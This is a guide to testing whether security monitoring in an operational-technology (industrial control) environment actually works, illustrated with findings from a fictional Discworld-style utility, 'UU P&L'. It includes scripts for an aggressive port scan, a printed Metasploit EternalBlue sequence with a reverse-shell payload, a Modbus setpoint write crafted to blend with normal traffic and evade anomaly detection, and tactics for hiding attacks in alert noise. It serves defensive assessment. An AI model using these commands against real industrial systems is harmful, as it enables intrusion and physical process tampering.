Detection capability testing

Finding out if anyone’s watching the watchers.

The City Watch of Ankh-Morpork has, over the years, developed from a organisation primarily concerned with preventing crime into one primarily concerned with creating the appearance of preventing crime. The distinction is subtle but important. The Watch patrols the streets, maintains a visible presence, and responds to incidents with impressive speed. Whether they actually prevent crime is another matter entirely, but they certainly make everyone feel safer, which is worth something.

Many OT security monitoring systems work on similar principles. There are intrusion detection systems faithfully logging every packet. There are SIEMs (Security Information and Event Management systems) collecting logs from dozens of sources. There are alarms configured to trigger on suspicious activity. The question is whether anyone is actually watching these systems, whether anyone responds when they alert, and whether the alerts are tuned well enough to represent actual problems rather than operational noise.

Detection capability testing is the process of determining whether security monitoring actually works. Not whether it could work in theory, or whether it worked when first commissioned, but whether it works right now, today, in the actual operational environment with actual people responsible for actually responding to actual alerts.

This is distinctly different from penetration testing. In penetration testing, we are trying to compromise systems whilst avoiding detection. In detection capability testing, we are trying to be detected, specifically to verify that detection works. It’s like testing a burglar alarm by actually breaking in and seeing if anyone shows up.

At UU P&L, the security architecture diagram showed an impressive defence-in-depth strategy. Network IDS monitored all traffic between security zones. A SIEM correlated events from 47 different sources. Alarms were configured to trigger on suspicious activity and page the security operations centre. The SOC operated 24/7 with trained analysts. On paper, it was impenetrable.

In practice, the IDS had been generating so many false positives that someone had adjusted the thresholds until it stopped alerting on anything. The SIEM was forwarding all alerts to a shared mailbox that accumulated approximately 3,000 emails per day, of which nobody read any. The SOC was primarily focused on physical security (gates and cameras), and the one analyst who’d been trained on the OT security systems had left the company eight months ago. The defence-in-depth strategy had, through entropy and human nature, become defence-in-breadth-but-not-much-depth.

Understanding current monitoring capabilities

Before testing detection, understand what monitoring exists:

Document monitoring systems

Network layer:

  • IDS: Snort, installed 2019 Location: Between corporate and OT networks Ruleset: ET Open, last updated 2021 Alerting: Email to security@uupl.edu

  • Network tap: Industrial-grade copper tap Location: PLC network uplink Connected to: Wireshark server (offline analysis) Retention: 7 days

Application layer:

  • SCADA system: Built-in audit logging Events logged: User logins, command issuance, alarm acknowledgments Log destination: Local files on HMI servers Retention: 90 days Monitoring: None (logs never reviewed)

  • PLC audit logs: Available but not enabled Status: Disabled (impacts PLC performance)

System layer:

  • Windows Event Logs: Enabled on all Windows systems Forwarded to: SIEM Retention: 30 days on SIEM

  • Linux auth logs: Enabled on jump server Forwarded to: Local syslog (not centralized) Retention: 7 days

SIEM:

  • Product: Splunk

  • Sources: 47 configured inputs

  • Dashboards: 12 configured

  • Alerts: 37 configured rules

  • Last login: 2023-08-15 (4 months ago)

Identify alert destinations

Where do alerts actually go?

IDS Alerts → security@uupl.edu → Shared mailbox → Nobody reads it

SIEM Alerts → splunk-alerts@uupl.edu → Ticket system → Auto-closed after 30 days

SCADA Alarms → HMI display → Operator console → Audible alarm

Windows Security Events → SIEM → Critical alerts to SOC → SOC focuses on physical security

PLC Alarms → HMI display → Operator console → Logged but not analyzed

Map responsible parties

Who’s supposed to respond to each alert type?

Network security alerts:

  • Primary: IT Security Team (3 people, all part-time)

  • Secondary: IT Manager (reports to CIO)

  • Actual: Nobody (mailbox unmonitored)

SCADA alarms:

  • Primary: Control room operators

  • Secondary: Engineering on-call

  • Actual: Operators (but alert fatigue is severe)

System security events:

  • Primary: IT Operations

  • Secondary: IT Security

  • Actual: Varies (depends on severity and visibility)

At UU P&L, we discovered that the org chart showed clear responsibilities, but the reality was that security monitoring had gradually become “someone else’s problem”. IT security thought operations was monitoring the OT systems. Operations thought IT security was handling the security monitoring. Everyone thought the SIEM was providing oversight, but nobody had logged into the SIEM in four months.

IDS and IPS effectiveness testing

Intrusion Detection Systems look for attack patterns in network traffic. Intrusion Prevention Systems do the same but also attempt to block attacks. Testing their effectiveness means intentionally triggering them and observing the response.

Test signature-based detection

Most IDS systems use signatures, patterns that match known attacks. Test whether they detect common attacks:

#!/usr/bin/env python3
"""
IDS Detection Test: Port Scanning
Tests whether network scanning triggers IDS alerts
"""

import nmap
import time
from datetime import datetime

def test_port_scan_detection(target_network):
    """
    Perform obvious port scan that should trigger IDS
    """
    
    print("[*] IDS Detection Test: Port Scanning")
    print(f"[*] Target: {target_network}")
    print(f"[*] Time: {datetime.now()}")
    print("[*] This scan should trigger IDS signature: SCAN NMAP TCP")
    
    nm = nmap.PortScanner()
    
    # Aggressive scan (should definitely be detected)
    print("\n[*] Performing aggressive TCP SYN scan...")
    nm.scan(target_network, '1-1000', arguments='-sS -T4 -v')
    
    print("[*] Scan complete")
    print("\n[*] EXPECTED DETECTION:")
    print("    - IDS should log scan activity")
    print("    - Alert should be generated")
    print("    - Email to security@uupl.edu")
    print("\n[*] Wait 15 minutes, then check:")
    print("    - IDS logs for scan detection")
    print("    - Security mailbox for alert")
    print("    - SOC for any response")
    
    return datetime.now()

def test_exploit_detection(target_ip):
    """
    Test detection of exploit attempts
    Uses Metasploit to generate known exploit traffic
    """
    
    print("\n[*] IDS Detection Test: Exploit Attempt")
    print(f"[*] Target: {target_ip}")
    print(f"[*] Time: {datetime.now()}")
    print("[*] This should trigger: ET EXPLOIT Microsoft Windows SMB Remote Code Execution")
    
    # This would use Metasploit to generate exploit traffic
    # For documentation purposes only
    print("""
    msfconsole
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOST {target_ip}
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST {attacker_ip}
    exploit
    """)
    
    print("\n[*] EXPECTED DETECTION:")
    print("    - IDS signature match on exploit traffic")
    print("    - High-priority alert generated")
    print("    - Immediate SOC response expected")

if __name__ == '__main__':
    # Test against known OT network
    scan_time = test_port_scan_detection('192.168.10.0/24')
    
    # Document test for report
    with open('ids_detection_test_log.txt', 'w') as f:
        f.write(f"IDS Detection Test\n")
        f.write(f"Test Time: {scan_time}\n")
        f.write(f"Target: 192.168.10.0/24\n")
        f.write(f"Expected Detection: SCAN NMAP TCP\n")
        f.write(f"\nVerification Required:\n")
        f.write(f"- Check IDS logs at {scan_time}\n")
        f.write(f"- Check security mailbox for alert\n")
        f.write(f"- Interview SOC: Did they see/respond to alert?\n")

Perform the test, document the exact time, then verify:

  1. Does the IDS log the activity? (Check IDS console or logs)

  2. Does an alert fire? (Check alert destinations)

  3. Does anyone respond? (Check with SOC or security team)

At UU P&L, we performed three detection tests:

Test 1: Aggressive port scan

  • Performed: 2024-12-10 14:35:22

  • IDS Detection: YES (logged in Snort)

  • Alert Generated: YES (email sent)

  • Human Response: NO (mailbox unmonitored)

  • Result: Detection works, response doesn’t

Test 2: SMB exploit attempt

  • Performed: 2024-12-10 15:12:44

  • IDS Detection: NO (signature out of date)

  • Alert Generated: NO

  • Human Response: NO

  • Result: Detection failed (outdated signatures)

Test 3: Modbus write command

  • Performed: 2024-12-10 16:03:11

  • IDS Detection: NO (no OT-specific rules)

  • Alert Generated: NO

  • Human Response: NO

  • Result: Detection failed (OT protocols not monitored)

SIEM correlation testing

SIEMs are supposed to correlate events from multiple sources to identify complex attacks that wouldn’t be obvious from single events.

Test multi-stage attack detection

Perform an attack that involves multiple steps and see if the SIEM correlates them:

Attack chain:

  1. Login to VPN from unusual location (UK to US)

  2. Multiple failed login attempts on jump server

  3. Successful login after failures

  4. RDP from jump server to engineering workstation

  5. Download of PLC configuration files

  6. Connection to PLC network

  7. Modbus write commands to multiple PLCs

Expected SIEM correlation:

  • VPN login from new location → Flag as suspicious

  • Failed logins → Flag as brute force attempt

  • Successful login after failures → Escalate priority

  • Unusual RDP activity → Add to event chain

  • File downloads + PLC connections + Write commands → Critical Alert: Potential OT Attack Chain

Test whether this correlation actually happens:

#!/usr/bin/env python3
"""
SIEM Correlation Test: Multi-Stage Attack
Tests whether SIEM correlates related events into attack chain
"""

import time
from datetime import datetime

def simulate_attack_chain():
    """
    Perform multi-step attack to test SIEM correlation
    """
    
    test_start = datetime.now()
    
    print("[*] SIEM Correlation Test: Multi-Stage Attack")
    print(f"[*] Test Start: {test_start}\n")
    
    # Step 1: Suspicious VPN login
    print("[*] Step 1: VPN Login from unusual location")
    print("    Action: Login to VPN from US IP (normally UK)")
    print("    Expected: SIEM flags unusual geo-location")
    input("    Press Enter when complete...")
    
    # Step 2: Brute force attempt
    print("\n[*] Step 2: Brute force jump server")
    print("    Action: 10 failed SSH attempts, then successful")
    print("    Expected: SIEM detects brute force pattern")
    input("    Press Enter when complete...")
    
    # Step 3: Lateral movement
    print("\n[*] Step 3: RDP to engineering workstation")
    print("    Action: RDP from jump server to 192.168.1.10")
    print("    Expected: SIEM logs RDP connection")
    input("    Press Enter when complete...")
    
    # Step 4: Data access
    print("\n[*] Step 4: Access PLC configuration")
    print("    Action: Copy PLC project files to USB")
    print("    Expected: SIEM logs file access (if file auditing enabled)")
    input("    Press Enter when complete...")
    
    # Step 5: PLC access
    print("\n[*] Step 5: Connect to PLCs")
    print("    Action: Modbus connections to 192.168.10.10-12")
    print("    Expected: Network IDS logs Modbus traffic")
    input("    Press Enter when complete...")
    
    test_end = datetime.now()
    
    print(f"\n[*] Test Complete: {test_end}")
    print(f"[*] Duration: {test_end - test_start}")
    
    print("\n[*] EXPECTED SIEM BEHAVIOR:")
    print("    - Each event logged individually")
    print("    - Events correlated by source IP/username")
    print("    - Attack chain recognized")
    print("    - High-priority alert generated")
    print("    - SOC investigation initiated")
    
    print("\n[*] VERIFICATION REQUIRED:")
    print("    1. Check SIEM for individual event logs")
    print("    2. Check SIEM for correlated attack chain alert")
    print("    3. Interview SOC: Did they investigate?")
    print("    4. Check incident response: Was ticket created?")
    
    with open('siem_correlation_test.txt', 'w') as f:
        f.write(f"SIEM Correlation Test\n")
        f.write(f"Start: {test_start}\n")
        f.write(f"End: {test_end}\n")
        f.write(f"\nAttack Chain Steps:\n")
        f.write(f"1. VPN login from US\n")
        f.write(f"2. SSH brute force (10 failures)\n")
        f.write(f"3. RDP to engineering workstation\n")
        f.write(f"4. PLC configuration access\n")
        f.write(f"5. Multiple Modbus connections\n")
        f.write(f"\nExpected: Correlated attack chain alert\n")

if __name__ == '__main__':
    simulate_attack_chain()

At UU P&L, we performed this test and discovered:

  • Event 1 (VPN login): Logged in SIEM ✓

  • Event 2 (Failed logins): Logged in SIEM ✓

  • Event 3 (RDP): Logged in SIEM ✓

  • Event 4 (File access): NOT logged (file auditing not enabled) ✗

  • Event 5 (Modbus): NOT logged in SIEM (IDS not integrated with SIEM) ✗

  • Correlation: NO correlation rules configured for this attack pattern ✗

  • Alert: NO alert generated ✗

  • Human Response: NO response ✗

The SIEM was collecting logs, but it wasn’t correlating them into meaningful patterns. Each event was visible if we specifically searched for it, but there was no automatic detection of the attack chain.

Anomaly detection bypass

Some monitoring systems use anomaly detection, they learn what’s “normal” and alert on deviations. Test whether we can perform attacks whilst staying within “normal” parameters:

Blend with normal operations

#!/usr/bin/env python3
"""
Anomaly Detection Bypass Test
Tests whether attacks can blend with normal traffic patterns
"""

import time
from pymodbus.client import ModbusTcpClient

def test_slow_attack(plc_ip):
    """
    Perform attack slowly to avoid anomaly detection
    """
    
    print("[*] Anomaly Detection Bypass Test")
    print("[*] Strategy: Slow, deliberate actions that match normal patterns\n")
    
    # Learn normal patterns first
    print("[*] Phase 1: Learning normal operations")
    print("    - HMI polls every 1 second")
    print("    - Engineering workstation connects 9 AM - 5 PM")
    print("    - Typical Modbus read: 10-20 registers")
    print("    - Typical Modbus write: 1-5 registers")
    
    # Attack that blends in
    print("\n[*] Phase 2: Performing attack with normal-looking traffic")
    
    client = ModbusTcpClient(plc_ip, port=502)
    client.connect()
    
    # Read operations (appears as normal monitoring)
    print("    [*] Reading PLC state (appears as normal monitoring)...")
    for _ in range(5):
        result = client.read_holding_registers(1000, 10, slave=1)
        time.sleep(1)  # Match HMI polling rate
    
    # Write operation (appears as normal engineering change)
    print("    [*] Modifying setpoint (appears as normal engineering change)...")
    print("    [*] Performing during business hours (9 AM - 5 PM)")
    print("    [*] Small change (within normal operational range)")
    
    # Change speed from 1500 to 1490 RPM (small, within normal range)
    client.write_register(1000, 1490, slave=1)
    
    print("\n[*] Attack complete")
    print("[*] Traffic characteristics:")
    print("    - Timing: Matches normal polling")
    print("    - Frequency: Matches normal operations")
    print("    - Packet size: Matches normal Modbus")
    print("    - Time of day: During business hours")
    print("    - Change size: Within normal operational variance")
    
    print("\n[*] EXPECTED ANOMALY DETECTION RESULT:")
    print("    NO ALERTS - Traffic appears completely normal")
    
    client.close()

if __name__ == '__main__':
    test_slow_attack('192.168.10.10')

Alert fatigue exploitation

Alert fatigue occurs when monitoring systems generate so many alerts that humans stop paying attention. This is remarkably common in OT environments where normal operations can trigger hundreds of “security” alerts per day.

Test alert fatigue

Methodology:

  1. Review current alert volume

  2. Identify most common alerts

  3. Perform attack that generates similar alerts

  4. Verify attack alerts are ignored along with false positives

Example at UU P&L:

Current alert volume:

  • ~300 alerts/day

  • 95% false positives

  • Common alerts:

    • “Unusual Modbus traffic” (fires on normal HMI polling)

    • “Multiple login attempts” (fires on normal password typos)

    • “Unusual network connection” (fires on legitimate engineering activity)

Attack using alert fatigue:

  • Perform actual brute force attack

  • Generates “Multiple login attempts” alert

  • Alert looks identical to 50 other daily false positives

  • Lost in the noise, ignored by SOC

Result:

  • Attack successful

  • Alert generated correctly

  • Alert completely ignored due to alert fatigue

Document alert tuning needs

Current Alert Configuration:

  • 37 alert rules configured

  • 300+ daily alerts

  • 95% false positive rate

  • Result: Alert fatigue, real attacks ignored

Recommended Tuning:

  • Reduce false positives by tuning thresholds

  • Whitelist known-good activities

  • Prioritize high-confidence alerts

  • Target: <10 alerts/day, >50% true positive rate

Example: Current: “Unusual Modbus traffic” → Fires on ANY Modbus from unknown source Tuned: “Unauthorized Modbus write” → Fires only on WRITE commands from non-engineering sources

Impact:

  • Reduces daily alerts from 300 to ~15

  • Increases true positive rate from 5% to ~60%

  • Increases likelihood of human response to alerts

At UU P&L, we demonstrated that the monitoring systems were technically functional but operationally useless due to poor tuning. The IDS could detect attacks, but it also detected everything else, so nobody was listening when it screamed.

Logging gaps

Monitoring is only effective if relevant events are actually logged. Test for gaps:

Critical events that should be logged

PLC operations:

✓ Should log: Logic uploads/downloads | ✗ Actually logged: No (PLC auditing disabled)

✓ Should log: Configuration changes | ✗ Actually logged: No (PLC auditing disabled)

✓ Should log: Write commands to critical registers | ✗ Actually logged: Sometimes (if IDS catches them)

Network operations:

✓ Should log: Connections to PLC network | ✗ Actually logged: Partially (only at firewall, not at switches)

✓ Should log: Protocol-specific operations (Modbus writes, DNP3 commands) | ✗ Actually logged: No (IDS has no OT protocol awareness)

Authentication:

✓ Should log: VPN logins | ✓ Actually logged: Yes

✓ Should log: Failed login attempts | ✓ Actually logged: Yes

✓ Should log: Privilege escalations | ✗ Actually logged: Partially (Windows events logged, but not correlated)

Test critical gaps

#!/usr/bin/env python3
"""
Logging Gap Test: PLC Logic Modification
Tests whether PLC programming changes are logged
"""

def test_plc_logic_logging():
    """
    Modify PLC logic and check if it's logged anywhere
    """
    
    print("[*] Logging Gap Test: PLC Logic Modification")
    print("[*] Critical security event: Changing PLC program")
    print("[*] This should be logged, audited, and reviewed")
    
    # In reality, you'd upload modified logic via RSLogix/Studio 5000
    # For PoC, we document what we would do
    
    print("\n[*] Actions performed:")
    print("    1. Connected to PLC with RSLogix")
    print("    2. Downloaded existing logic")
    print("    3. Modified rung 347 (added diagnostic code)")
    print("    4. Uploaded modified logic to PLC")
    print("    5. PLC accepted new logic without authentication")
    
    print("\n[*] Expected logging:")
    print("    - PLC audit log: Logic upload event")
    print("    - SCADA system: Configuration change event")
    print("    - SIEM: Correlation of engineering software usage")
    print("    - Network IDS: Detection of programming traffic")
    
    print("\n[*] Actual logging:")
    print("    - PLC audit log: DISABLED")
    print("    - SCADA system: NO (doesn't monitor PLC programming)")
    print("    - SIEM: NO (no logs to correlate)")
    print("    - Network IDS: NO (no signatures for ladder logic uploads)")
    
    print("\n[*] RESULT: CRITICAL GAP")
    print("    Attacker can modify PLC logic with NO LOGGING")
    print("    Changes are persistent and undetected")
    print("    This is the highest-risk logging gap identified")

if __name__ == '__main__':
    test_plc_logic_logging()

Response time measurement

Even if detection works perfectly, effectiveness depends on response time. How quickly can the organization respond to an alert?

Test response workflow

Alert response test:

  1. Generate test alert (inform SOC this is a test)

  2. Document alert generation time

  3. Measure time to:

    • Alert reaches monitoring station

    • Analyst acknowledges alert

    • Analyst begins investigation

    • Analyst escalates to engineering

    • Engineering responds

    • Issue is resolved

Example Timeline at UU P&L:

14:35:22 - Alert generated (port scan detected)
14:35:24 - Email sent to security@uupl.edu
14:35:28 - Email delivered to mailbox
[6 hours pass - mailbox not monitored]
20:41:15 - IT security checks mailbox (next business day)
20:45:33 - Analyst reviews alert
20:52:11 - Analyst determines it's a penetration test
21:03:44 - Analyst contacts OT engineering
[Engineering after hours, no immediate response]
09:15:22 - Engineering reviews alert (next business day)
09:32:18 - Engineering confirms test, no action needed

Total time from alert to response: 18 hours 57 minutes

During an actual attack, attacker would have completed objectives and cleaned up traces multiple times over.

Establish baseline response times

Critical Alert (PLC manipulation detected):

  • Target response time: < 15 minutes

  • Actual response time: 18+ hours

  • Gap: Monitoring mailbox not checked in real-time

High Alert (Brute force attempt):

  • Target response time: < 1 hour

  • Actual response time: 20+ hours

  • Gap: No after-hours monitoring

Medium Alert (Unusual traffic pattern):

  • Target response time: < 4 hours

  • Actual response time: Never (lost in alert noise)

  • Gap: Alert fatigue means medium alerts ignored

The reality of detection in OT

The harsh truth about detection in OT environments is that most organizations have invested in monitoring technology but not in monitoring operations. They have IDS systems that nobody watches, SIEM platforms that nobody logs into, and alerts that nobody responds to. The security controls exist, they’re just not actually controlling anything.

This isn’t entirely the fault of the security team. OT environments are difficult to monitor because:

  • Normal operations can look like attacks (lots of Modbus polling, frequent network scans, etc.)

  • Attack patterns aren’t well-defined (OT-specific attack signatures are rare)

  • Alert tuning requires deep understanding of both security and operations

  • 24/7 monitoring is expensive and difficult to justify

  • Response requires coordination between IT security and OT engineering

  • False positives are common and create alert fatigue

At UU P&L, we found that detection capability existed in theory but not in practice. The technical controls were mostly functional, but the operational processes around them had gradually degraded until the entire monitoring infrastructure was essentially decorative.

Our recommendations focused less on technology and more on process:

  1. Reduce false positives: Tune alerts so they’re actionable

  2. Integrate monitoring: Connect IDS to SIEM, enable PLC auditing

  3. Define clear ownership: Who monitors what, who responds to what

  4. Establish realistic SLAs: Response times based on actual capability

  5. Regular testing: Quarterly detection tests to verify monitoring works

  6. Training: Ensure SOC understands OT-specific attacks

The goal isn’t perfect detection (which doesn’t exist). The goal is detection that’s good enough to catch most attacks, tuned well enough that alerts are taken seriously, and backed by processes that ensure someone actually responds when alerts fire.

Detection without response is just expensive logging. Response without detection is impossible. We need both, and they need to work together, and someone needs to be responsible for making sure they continue to work together as the environment evolves. That is the hard part, and it is not a technology problem.